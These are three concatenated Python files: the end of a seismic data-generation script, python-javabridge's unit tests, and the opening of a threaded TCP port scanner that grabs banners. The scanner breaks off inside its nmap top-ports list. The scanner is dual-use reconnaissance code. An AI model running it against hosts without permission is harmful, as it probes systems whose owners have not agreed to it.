cmd(f"chmod 777 /dev/shm/RSFTMP/data_{iShotBlock}")
os.environ["DATAPATH"]=f"/dev/shm/RSFTMP/data_{iShotBlock}"
cmd(f"echo $DATAPATH")
cmd(f"mkdir data_{iShotBlock}")
seed()
#cmd(f"sfwindow < overthrust3D.hh n3=120 f1={iShotBlock*randint(0,1e7) % 400} n1=1 | sftransp | sfadd scale=1000 | sfput d1=25 d2=25 --out=stdout > data_{iShotBlock}/overthrust2D.hh")
#cmd(f"cp {c.trmodel} data_{iShotBlock}/")
with cd(f"data_{iShotBlock}"):
_vel = generate_model(model_input=f"../{c.trmodel}", random_state_number=(iShotBlock + randint(0,1e7)))
#plt_nb_T(_vel)
generate_rsf_data()
##%%
def generate_all_data(random_model_repeat=c.random_model_repeat):
K.clear_session()
start_modeling_time = time.time()
procs = []
for iShotBlock in range(random_model_repeat):
# we run modeling on 1-3 GPUs, GPU 0 is for the network
os.environ["CUDA_VISIBLE_DEVICES"] = str((iShotBlock % 3) + 1)
proc = multiprocessing.Process(target=generate_rsf_data_multi, kwargs ={'iShotBlock' : iShotBlock})
proc.start()
procs.append(proc)
if len(procs) > 100:
for proc in procs[:50]:
proc.join()
procs = procs[50:]
for proc in procs:
proc.join()
print(f"Time for modeling = {toc(start_modeling_time)}")
start_merging_rsf_time = time.time()
cmd(f"sfcat data_*/shots_cmp.rsf axis=4 > shots_cmp_full.rsf")
cmd(f"sfcat data_*/logs.rsf axis=3 > logs_full.rsf")
print(f"Time for merging rsf files = {toc(start_merging_rsf_time)}")
os.environ["CUDA_VISIBLE_DEVICES"]=CUDA_VISIBLE_DEVICES
# generate_all_data()
if __name__ == "__main__":
time_start = time.time()
cmd("rm new_data_ready")
print("LOOOOOOOOOOOOOOOOP for data generation started")
sleep_counter = 0
while True:
if os.path.exists('training_finished'):
cmd("rm training_finished")
print("data generation finished as training_finished")
print(f"total execution time = {time.time()-time_start}, total idle = {sleep_counter}s")
quit()
elif os.path.exists('new_data_ready'):
sleep_counter += 1
print(f"network is not ready for new data, sleep {sleep_counter} sec", end='\r')
time.sleep(1)
else:
generate_all_data()
cmd("touch new_data_ready")
|
test_jutil.py
|
'''test_jutil.py - test the high-level interface
python-javabridge is licensed under the BSD license. See the
accompanying file LICENSE for details.
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2013 Broad Institute
All rights reserved.
'''
from __future__ import absolute_import
import gc
import os
import random # <AK> was: numpy as np
import threading
import unittest
import sys
import javabridge
# Monkey patch some half-corrent implementations of methods that only
# appeared in Python 2.7.
if not hasattr(unittest.TestCase, 'assertIn'): # pragma: no cover # <AK> added
unittest.TestCase.assertIn = lambda self, a, b: self.assertTrue(a in b)
if not hasattr(unittest.TestCase, 'assertNotIn'): # pragma: no cover # <AK> added
unittest.TestCase.assertNotIn = lambda self, a, b: self.assertTrue(a not in b)
if not hasattr(unittest.TestCase, 'assertSequenceEqual'): # pragma: no cover # <AK> added
unittest.TestCase.assertSequenceEqual = lambda self, a, b: self.assertTrue([aa == bb for aa, bb in zip(a, b)])
class TestJutil(unittest.TestCase):
def setUp(self):
self.env = javabridge.attach()
def tearDown(self):
javabridge.detach()
def test_01_01_to_string(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.to_string(jstring), "Hello, world")
def test_01_02_make_instance(self):
jobject = javabridge.make_instance("java/lang/Object", "()V")
self.assertTrue(javabridge.to_string(jobject).startswith("java.lang.Object"))
# <AK> added
with self.assertRaisesRegex(javabridge.JavaError,
'Could not find constructor with signature = '
'"\(\)V"'):
jobject = javabridge.make_instance("java/lang/Class", "()V")
# </AK>
def test_01_03_call(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.call(jstring, "charAt", "(I)C", 0), "H")
def test_01_03_01_static_call(self):
result = javabridge.static_call("Ljava/lang/String;", "valueOf",
"(I)Ljava/lang/String;",123)
self.assertEqual(result, "123")
# <AK> added
with self.assertRaisesRegex(javabridge.JavaError,
'Could not find method name = "unknown method" '
'with signature = "\(I\)Ljava/lang/String;"'):
result = javabridge.static_call("Ljava/lang/String;", "unknown method",
"(I)Ljava/lang/String;",123)
# </AK>
def test_01_04_make_method(self):
env = self.env
class String(object):
def __init__(self):
self.o = env.new_string_utf("Hello, world")
charAt = javabridge.make_method("charAt", "(I)C", "My documentation")
s = String()
self.assertEqual(s.charAt.__doc__, "My documentation")
self.assertEqual(s.charAt(0), "H")
def test_01_05_00_get_static_field(self):
klass = self.env.find_class("java/lang/Short")
self.assertEqual(javabridge.get_static_field(klass, "MAX_VALUE", "S"), 2**15 - 1)
def test_01_05_01_no_field_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'java/lang/Object', "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_02_no_class_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'no/such/class', "field", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_03_set_static_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
test_cases = (
("fs_boolean", "Z", True), # <AK> added
("fs_char", "C", "A"),
("fs_byte", "B", 3),
("fs_short", "S", 15),
("fs_int", "I", 392),
("fs_long", "J", -14),
("fs_float", "F", 1.03),
("fs_double", "D", -889.1),
("fs_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("fs_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_static_field(class_name, field_name, signature, value)
v = javabridge.get_static_field(class_name, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_01_05_04_no_field_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'java/lang/Object', "NoSuchField", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_05_no_class_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'no/such/class', "field", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_06_get_enumeration_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
keys = javabridge.call(properties, "keys", "()Ljava/util/Enumeration;")
enum = javabridge.get_enumeration_wrapper(keys)
has_java_vm_name = False
while(enum.hasMoreElements()):
key = javabridge.to_string(enum.nextElement())
if key == "java.vm.name":
has_java_vm_name = True
self.assertTrue(has_java_vm_name)
def test_01_07_get_dictionary_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
self.assertTrue(d.size() > 10)
self.assertFalse(d.isEmpty())
keys = javabridge.get_enumeration_wrapper(d.keys())
values = javabridge.get_enumeration_wrapper(d.elements())
n_elems = d.size()
for i in range(n_elems):
self.assertTrue(keys.hasMoreElements())
key = javabridge.to_string(keys.nextElement())
self.assertTrue(values.hasMoreElements())
value = javabridge.to_string(values.nextElement())
self.assertEqual(javabridge.to_string(d.get(key)), value)
self.assertFalse(keys.hasMoreElements())
self.assertFalse(values.hasMoreElements())
def test_01_08_jenumeration_to_string_list(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
enum = javabridge.get_enumeration_wrapper(d.keys())
for i in range(d.size()):
key = javabridge.to_string(enum.nextElement())
self.assertEqual(key, keys[i])
def test_01_09_jdictionary_to_string_dictionary(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
pyd = javabridge.jdictionary_to_string_dictionary(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
for key in keys:
value = javabridge.to_string(d.get(key))
self.assertEqual(pyd[key], value)
def test_01_10_make_new(self):
env = self.env
class MyClass:
new_fn = javabridge.make_new("java/lang/Object", '()V')
def __init__(self):
self.new_fn()
my_instance = MyClass()
def test_01_11_class_for_name(self):
c = javabridge.class_for_name('java.lang.String')
name = javabridge.call(c, 'getCanonicalName', '()Ljava/lang/String;')
self.assertEqual(name, 'java.lang.String')
def test_02_01_access_object_across_environments(self):
#
# Create an object in one environment, close the environment,
# open a second environment, then use it and delete it.
#
env = self.env
self.assertTrue(isinstance(env,javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_02_delete_in_environment(self):
env = self.env
self.assertTrue(isinstance(env, javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
del my_integer
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_03_death_and_resurrection(self):
'''Put an object into another in Java, delete it in Python and recover it'''
random.seed(24) # <AK> was: np.random.seed(24)
my_value = random.randrange(0, 1000) # <AK> was: np.random.randint(0, 1000)
jobj = javabridge.make_instance("java/lang/Integer", "(I)V", my_value)
integer_klass = self.env.find_class("java/lang/Integer")
jcontainer = self.env.make_object_array(1, integer_klass)
self.env.set_object_array_element(jcontainer, 0, jobj)
del jobj
gc.collect()
jobjs = self.env.get_object_array_elements(jcontainer)
jobj = jobjs[0]
self.assertEqual(javabridge.call(jobj, "intValue", "()I"), my_value)
def test_02_04_non_java_thread_deletes_it(self):
'''Delete a Java object on a not-Java thread'''
refs = [javabridge.make_instance("java/lang/Integer", "(I)V", 5)]
def run():
del refs[0]
gc.collect()
t = threading.Thread(target = run)
t.start()
t.join()
def test_03_01_cw_from_class(self):
'''Get a class wrapper from a class'''
c = javabridge.get_class_wrapper(javabridge.make_instance('java/lang/Integer', '(I)V',
14))
# <AK> added
self.assertIn("public static int java.lang.Integer.divideUnsigned(int,int)\n", repr(c))
def test_03_02_cw_from_string(self):
'''Get a class wrapper from a string'''
c = javabridge.get_class_wrapper("java.lang.Number")
def test_03_03_cw_get_classes(self):
c = javabridge.get_class_wrapper('java.lang.Number')
classes = c.getClasses()
self.assertEqual(len(javabridge.get_env().get_object_array_elements(classes)), 0)
def test_03_04_cw_get_annotation(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotation = c.getAnnotation(javabridge.class_for_name('java.lang.Deprecated'))
self.assertTrue(annotation is not None)
def test_03_05_cw_get_annotations(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotations = c.getAnnotations()
annotations = javabridge.get_env().get_object_array_elements(annotations)
self.assertEqual(len(annotations), 1)
self.assertTrue(javabridge.to_string(annotations[0]).startswith('@java.lang.Deprecated'))
def test_03_06_cw_get_constructors(self):
c = javabridge.get_class_wrapper('java.lang.String')
constructors = c.getConstructors()
constructors = javabridge.get_env().get_object_array_elements(constructors)
self.assertEqual(len(constructors), 15)
def test_03_07_cw_get_fields(self):
c = javabridge.get_class_wrapper('java.lang.String')
fields = c.getFields()
fields = javabridge.get_env().get_object_array_elements(fields)
self.assertEqual(len(fields), 1)
self.assertEqual(javabridge.call(fields[0], 'getName', '()Ljava/lang/String;'),
"CASE_INSENSITIVE_ORDER")
def test_03_08_cw_get_field(self):
c = javabridge.get_class_wrapper('java.lang.String')
field = c.getField('CASE_INSENSITIVE_ORDER')
modifiers = javabridge.call(field, 'getModifiers', '()I')
static = javabridge.get_static_field('java/lang/reflect/Modifier','STATIC','I')
self.assertEqual((modifiers & static), static)
def test_03_09_cw_get_method(self):
sclass = javabridge.class_for_name('java.lang.String')
iclass = javabridge.get_static_field('java/lang/Integer', 'TYPE',
'Ljava/lang/Class;')
c = javabridge.get_class_wrapper('java.lang.String')
m = c.getMethod('charAt', [ iclass ])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')), 'char')
m = c.getMethod('concat', [ sclass])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')),
'class java.lang.String')
def test_03_10_cw_get_methods(self):
c = javabridge.get_class_wrapper('java.lang.String')
mmm = javabridge.get_env().get_object_array_elements(c.getMethods())
self.assertTrue(any([javabridge.call(m, 'getName', '()Ljava/lang/String;') == 'concat'
for m in mmm]))
def test_03_11_cw_get_constructor(self):
c = javabridge.get_class_wrapper('java.lang.String')
sclass = javabridge.class_for_name('java.lang.String')
constructor = c.getConstructor([sclass])
self.assertEqual(javabridge.call(constructor, 'getName', '()Ljava/lang/String;'),
'java.lang.String')
def test_04_01_field_get(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
v = f.get(None)
self.assertEqual(javabridge.to_string(v), '127')
def test_04_02_field_name(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
self.assertEqual(f.getName(), 'MAX_VALUE')
def test_04_03_field_type(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
t = f.getType()
self.assertEqual(javabridge.to_string(t), 'byte')
def test_04_04_field_modifiers(self):
# <AK> added
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
m = f.getModifiers()
self.assertIsInstance(m, list)
self.assertEqual(set(m), {'PUBLIC', 'STATIC', 'FINAL'})
def test_05_01_run_script(self):
self.assertEqual(javabridge.run_script("2+2"), 4)
def test_05_02_run_script_with_inputs(self):
self.assertEqual(javabridge.run_script("a+b", bindings_in={"a":2, "b":3}), 5)
def test_05_03_run_script_with_outputs(self):
outputs = { "result": None}
javabridge.run_script("var result = 2+2;", bindings_out=outputs)
self.assertEqual(outputs["result"], 4)
def test_06_01_execute_asynch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"))
def test_06_02_execute_synch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"), True)
def test_06_03_future_main(self):
c = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
result = javabridge.execute_future_in_main_thread(
javabridge.make_future_task(c, fn_post_process=javabridge.unwrap_javascript))
self.assertEqual(result, 4)
def test_07_01_wrap_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
self.assertFalse(wfuture.isDone())
self.assertFalse(wfuture.isCancelled())
wfuture.run()
self.assertTrue(wfuture.isDone())
self.assertEqual(wfuture.get(), 4)
def test_07_02_cancel_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
wfuture.cancel(True)
self.assertTrue(wfuture.isCancelled())
self.assertRaises(javabridge.JavaException, wfuture.get)
def test_07_03_make_future_task_from_runnable(self):
future = javabridge.make_future_task(
javabridge.run_script("new java.lang.Runnable() { run: function() {}};"),
11)
future.run()
self.assertEqual(javabridge.call(future.get(), "intValue", "()I"), 11)
def test_07_04_make_future_task_from_callable(self):
call_able = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
future = javabridge.make_future_task(
call_able, fn_post_process=javabridge.unwrap_javascript)
future.run()
self.assertEqual(future.get(), 4)
def test_08_01_wrap_collection(self):
c = javabridge.make_instance("java/util/HashSet", "()V")
w = javabridge.get_collection_wrapper(c)
self.assertFalse(hasattr(w, "addI"))
self.assertEqual(w.size(), 0)
self.assertEqual(len(w), 0)
self.assertTrue(w.isEmpty())
def test_08_02_add(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
self.assertTrue(c.add("Foo"))
self.assertEqual(len(c), 1)
self.assertFalse(c.isEmpty())
def test_08_03_contains(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c.add("Foo")
self.assertTrue(c.contains("Foo"))
self.assertFalse(c.contains("Bar"))
self.assertIn("Foo", c)
self.assertNotIn("Bar", c)
def test_08_04_addAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2.addAll(c1.o)
self.assertIn("Foo", c2)
def test_08_05__add__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c3 = c1 + c2
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c3)
c4 = c3 + ["Hello", "World"]
self.assertIn("Hello", c4)
self.assertIn("World", c4)
def test_08_06__iadd__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2 += c1
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c2)
c2 += ["Hello", "World"]
self.assertIn("Hello", c2)
self.assertIn("World", c2)
def test_08_07_contains_all(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
self.assertFalse(c2.containsAll(c1.o))
c2 += c1
self.assertTrue(c2.containsAll(c1.o))
def test_08_08_remove(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c1.remove("Foo")
self.assertNotIn("Foo", c1)
def test_08_09_removeAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.removeAll(c2)
self.assertNotIn("Foo", c1)
def test_08_10_retainAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.retainAll(c2)
self.assertIn("Foo", c1)
self.assertNotIn("Bar", c1)
def test_08_11_toArray(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
result = [javabridge.to_string(x) for x in c1.toArray()]
self.assertIn("Foo", result)
self.assertIn("Bar", result)
def test_08_12_make_list(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertSequenceEqual(l, ["Foo", "Bar"])
self.assertTrue(hasattr(l, "addI"))
def test_08_13_addI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addI(1, "Baz")
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_14_addAllI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addAllI(1, javabridge.make_list(["Baz"]))
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_15_indexOf(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.indexOf("Bar"), 1)
self.assertEqual(l.lastIndexOf("Foo"), 0)
def test_08_16_get(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.get(1), "Bar")
def test_08_17_set(self):
l = javabridge.make_list(["Foo", "Bar"])
l.set(1, "Baz")
self.assertEqual(l.get(1), "Baz")
def test_08_18_subList(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertSequenceEqual(l.subList(1, 3), ["Bar", "Baz"])
def test_08_19__getitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertEqual(l[1], "Bar")
self.assertEqual(l[-2], "Hello")
self.assertSequenceEqual(l[1:3], ["Bar", "Baz"])
self.assertSequenceEqual(l[::3], ["Foo", "Hello"])
def test_08_20__setitem__(self):
l = javabridge.make_list(["Foo", "Bar"])
l[1] = "Baz"
self.assertEqual(l.get(1), "Baz")
def test_08_21__delitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz"])
del l[1]
self.assertSequenceEqual(l, ["Foo", "Baz"])
def test_09_01_00_get_field(self):
o = javabridge.make_instance("org/cellprofiler/javabridge/test/RealRect", "(DDDD)V", 1, 2, 3, 4)
self.assertEqual(javabridge.get_field(o, "x", "D"), 1)
def test_09_02_get_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.get_field(o, "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_09_03_set_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
o = javabridge.make_instance(class_name, "()V")
test_cases = (
("f_boolean", "Z", True), # <AK> added
("f_char", "C", "A"),
("f_byte", "B", 3),
("f_short", "S", 15),
("f_int", "I", 392),
("f_long", "J", -14),
("f_float", "F", 1.03),
("f_double", "D", -889.1),
("f_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("f_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_field(o, field_name, signature, value)
v = javabridge.get_field(o, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_09_04_set_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.set_field(o, "NoSuchField", "I", 1)
self.assertRaises(javabridge.JavaException, fn)
def test_10_01_iterate_java_on_non_iterator(self):
#
# Regression test of issue #11: the expression below segfaulted
#
def fn():
list(javabridge.iterate_java(javabridge.make_list(range(10)).o))
self.assertRaises(javabridge.JavaError, fn)
def test_10_01_class_path(self):
for arg in ['-cp', '-classpath', '-Djava.class.path=foo']:
self.assertRaises(ValueError, lambda: javabridge.start_vm([arg]))
def test_11_01_make_run_dictionary(self):
from javabridge.jutil import make_run_dictionary
o = javabridge.make_instance("java/util/Hashtable", "()V")
a = javabridge.make_instance("java/util/ArrayList", "()V")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"foo", "bar")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"baz", a)
d = make_run_dictionary(o)
self.assertIn("foo", d)
self.assertEquals(d["foo"], "bar")
self.assertIn("baz", d)
self.assertTrue(javabridge.call(d["baz"], "equals",
"(Ljava/lang/Object;)Z", a))
def test_12_01_jref(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
alt = javabridge.redeem_jref(ref_id)
o["bar"] = "bunny"
for key in o:
self.assertTrue(key in alt)
self.assertEqual(o[key], alt[key])
def test_12_02_jref_lost(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
del ref
self.assertRaises(KeyError, javabridge.redeem_jref, ref_id)
def test_12_03_jref_create_and_lock(self):
cpython = javabridge.JClassWrapper(
'org.cellprofiler.javabridge.CPython')()
d = javabridge.JClassWrapper('java.util.Hashtable')()
result = javabridge.JClassWrapper('java.util.ArrayList')()
d.put("result", result)
ref_self = javabridge.create_and_lock_jref(self)
d.put("self", ref_self)
cpython.execute(
'import javabridge\n'
'x = { "foo":"bar"}\n'
'ref_id = javabridge.create_and_lock_jref(x)\n'
'javabridge.JWrapper(result).add(ref_id)', d, d)
cpython.execute(
'import javabridge\n'
'ref_id = javabridge.JWrapper(result).get(0)\n'
'self = javabridge.redeem_jref(javabridge.to_string(self))\n'
'self.assertEqual(javabridge.redeem_jref(ref_id)["foo"], "bar")\n'
'javabridge.unlock_jref(ref_id)', d, d)
javabridge.unlock_jref(ref_self)
self.assertRaises(KeyError, javabridge.redeem_jref, ref_self)
def test_13_01_unicode_arg(self):
# On 2.x, check that a unicode argument is properly prepared
s = u"Hola ni\u00F1os"
s1, s2 = s.split(" ")
if sys.version_info.major == 2: s2 = s2.encode("utf-8")
env = javabridge.get_env()
js1 = env.new_string(s1+" ")
result = javabridge.call(
js1, "concat", "(Ljava/lang/String;)Ljava/lang/String;", s2)
self.assertEqual(s, result)
if __name__=="__main__":
unittest.main()
|
light_port_scanner.py
|
#!/usr/bin/env python3
# author: greyshell
# description: TBD
import socket
import optparse
from socket import *
from threading import *
from time import sleep
screenLock = Semaphore(value=1)
def connect_scan(tgtHost, tgtPort):
try:
sock = socket(AF_INET, SOCK_STREAM)
buffer = "greyshell\r\n"
connect = sock.connect((tgtHost, tgtPort))
sock.send(buffer)
results = sock.recv(1000)
screenLock.acquire()
print('[+] %d/tcp open' % tgtPort)
print('[-] ' + str(results))
except Exception as e:
screenLock.acquire()
finally:
screenLock.release()
sock.close()
def portScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print("[-] Cannot resolve '%s': Unknown host" % tgtHost)
return
try:
tgtName = gethostbyaddr(tgtIP)
print('\n[+] Scan Results for: ' + tgtName[0] + '\n')
except:
print('\n[+] Scan Results for: ' + tgtIP)
setdefaulttimeout(5)
for tgtPort in tgtPorts:
t = Thread(target=connect_scan, args=(tgtHost, int(tgtPort)))
t.start()
sleep(0.1)
def main():
# Adding parser functionality
parser = optparse.OptionParser('Usage %prog -H' + ' <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target port saperated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if tgtHost is None:
print('\n[-] You must specify a target host and port[s], saperated by comma')
print(parser.usage)
exit(0)
if tgtPorts[0] == 'None':
print('\n[-] Scanning top 1000 TCP ports preferred by nmap')
temp = "1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80," \
"81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146," \
"161,163,179,199,211,212,222,254,254,256,259,264,280,301,306,311,340,366,389,406,407," \
"416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544," \
"545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700," \
"705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901," \
"902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022," \
"1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038," \
"1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054," \
"1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070," \
"1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087," \
"1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107," \
"1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141," \
"1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187," \
"1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287," \
"1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494," \
"1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700," \
"1717,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914," \
"1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009," \
"2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2045,2046,2047," \
"2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170," \
"2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399," \
"2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725," \
"2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013," \
"3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306," \
"3322,3323,3324,3325,3333,3351,3367,3369,33670,3371,3372,3389,3390,3404,3476,3493,3517,3527," \
"3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851," \
"3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003," \
